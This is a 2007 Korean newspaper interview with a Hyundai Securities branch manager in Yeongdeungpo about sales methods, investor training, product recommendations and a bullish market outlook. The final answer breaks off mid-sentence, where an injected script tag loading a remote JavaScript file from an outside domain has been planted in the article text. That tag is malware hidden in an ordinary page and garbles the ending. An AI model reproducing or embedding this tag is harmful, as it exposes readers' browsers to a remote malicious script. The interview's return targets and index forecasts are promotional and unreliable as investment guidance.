EZ EZViwe

허정달 현대증권 영등포지점 지점장

관리자 기자  2007.07.26 05:49:00

기사프린트

본지는 고객과 회사에 최고 수입을 안겨다 주고, 자산관리영업을 강화해 다양한 수익기반을 갖추며 금융서비스의 전문화를 이룩한 허정달 현대증권 영등포지점 지점장을 만나 영업 노하우에 대해 살펴보았다.

허정달 현대증권 영등포지점 지점장

▲ 증권회사에서 일하게 된 특별한 계기와 지점장이 되기까지 특별한 동기가 있다면?

지난 88년 입사시기 당시 크게 각광을 받던 업종이었고, 향후 자본시장의 발전 속도에 따라서 제일로 크게 성장을 하리라는 기대감을 품고 입사했습니다. 금융시장에서 살아남기 위해 고객과의 쉼없는 교류와 신뢰를 통해 여기까지 오게 된 것 같습니다. 지점장을 야전사령관으로 비유하고 싶습니다. 야전사령관으로서 직원들과 함께 일심동체로 뒹굴도록 하겠습니다.

 

▲ 처음 증권거래를 원하는 고객에게 맞는 트레이닝 시스템은?

처음에는 100만원부터 시작을 하고, 6개월 경과 후 500만원, 1년 후 1천만원 등 적정 규모 5천만원 정도로 거래를 하는 것을 전문가들은 좋다고 봅니다. 거시에서 미시로, TOP에서 DOWN방식에 입각하는 것이 올바른 거래 시스템 방법입니다. 즉, 대세의 흐름을 읽고 주도 업종을 선정해, 30% 수익목표로 우량주를 분할 매수하는 것입니다.    

▲ 영등포지점의 목표 수익률은 어떻게 되며, 특화된 전문성 활동 분야가 있다면 소개?

영등포지점은 하루 150여명의 고객이 이용하는 지점입니다. 업종 대표 우량주 매매로 연 30%가 목표 수익률이고, 영등포지역 내의 새마을금고와 돈돈한 유대 관계를 토대로 안전하면서도 고수익이 가능한 ELS 청약에 발군의 실적을 거양 중입니다. 이는 우리나라 전체 금융고객의 60%가 은행에 자산을 맡기고 있다는 점에 주목해서 고객의 폭을 은행 고객으로 한정시키고, 집중적인 홍보전략을 펼치고 있는 중입니다. 눈에 보이는 수치도 중요하지만, 모든 직원과 한마음 한뜻으로 영등포지점의 끊임없는 성장을 위해 노력하겠습니다.  

▲ 증권사·금융사간의 경쟁이 한층 치열해지고 있는 가운데, 타사와 차별화된 경쟁력을 갖추기 위한 영업방식이 있다면?

 

다들 비슷하겠지만, 2인 1조로 주간 방문 계획을 미리 작성한 후 CMA, 적립식, ELS, 퇴직연금, 국내·해외펀드 등 다양한 금융상품을 고객들에게 성심 성의껏 설명해 드리고, 자금을 유치하는 중입니다. ‘고객 자산이 곧 내 자산이다’라는 생각을 가지고 업무에 임해야 보다 나은 경쟁력을 갖출 수 있을 것입니다. 또, 무엇보다 직접투자와 간접투자 비중을 적절히 조절해 고객에게 ‘높은 수익률’을 안겨 주는 것이 최우선이라고 생각합니다. 현재 주식시장의 전망이 밝으니 영업을 보다 강화하고, 적극적인 투자로 고객의 수익률을 강화하겠습니다.

▲ 앞으로 증권, 주식시장의 비전은 어떠한가?

증권사, 선물회사, 자산운용사, 자문사 등이 통폐합되는 방안으로 은행, 보험업을 제외하고 자유롭게 모든 업무를 보게 되는 ‘자본시장통합법’의 시행을 앞두고, 향후 노령하 사회에 대비한 안정적인 수익을 바라는 시중 자금의 꾸준한 펀드로의 이동 때문에 증권, 주식시장의 비전과 전망은 향후 몇 년간 무척이나 밝습니다. 2,500P선이 2010년경에 도달할 것 같습니다. 시장 환경의 흐름에 맞춰 신규 수익을 창출하고 기존 고객들에게는 자산규모에 맞게 본격적인 PB(프라이빗뱅킹)를 선보이겠습니다. 직접투자와 간접투자 비중을 일대 일로 맞추는 등 고객들 각각의 투자 포트폴리오를 다양하게 구성해 안정적이면서 높은 수익률을 거둘 수 있도록 발로 뛰는 지점 만들겠습니다. 

▲ 고객들과의 관계를 꾸준히 유지하기 위해 진행 중이거나 계획 중인 서비스 및 이벤트가 있다면? 

매일 그날의 주요 이슈와 경제 흐름, 세계 금융시장 동향 등에 대해 방송서비스 중입니다.  이와 함께 그 날의 증가 지수 맞히기 등을 통한 선물 증정 이벤트를 시행했고, 향후 주요 우수 고객님들의 생일이나 기념일날 ‘축하선물’, ‘케익이나 꽃’ 등을 선사해 드릴 예정입니다. 고객의 수익률로 직원의 성과를 평가하는 분위기가 정착되면서, 고객을 위한 서비스·찾아가는 서비스·발로 뛰는 서비스가 늘었습니다. 우리 영등포지점도 고객과의 관계를 꾸준히 유지하기 위해 다양한 고객 마케팅으로 개인고객 자산률과 수익률의 상위권을 유지하기 위해 더욱 힘쓰겠습니다. 이는 단순한 지점 홍보 차원이 아닌 ‘고객이 곧 내 가족’이라고 볼 수 있겠습니다.

▲ 고객들이 안정적이면서도 높은 수익률을 거둘 수 있도록, 조언 한 말씀과 추천 상품?

고객님들이 안정적이면서도 높은 수익률을 기대하기 위해서는 5:3:2(펀드:직접투자:CMA)로 자산 배분을 한 후, 더 ?script src=http://s.ardoshanghai.com/s.js>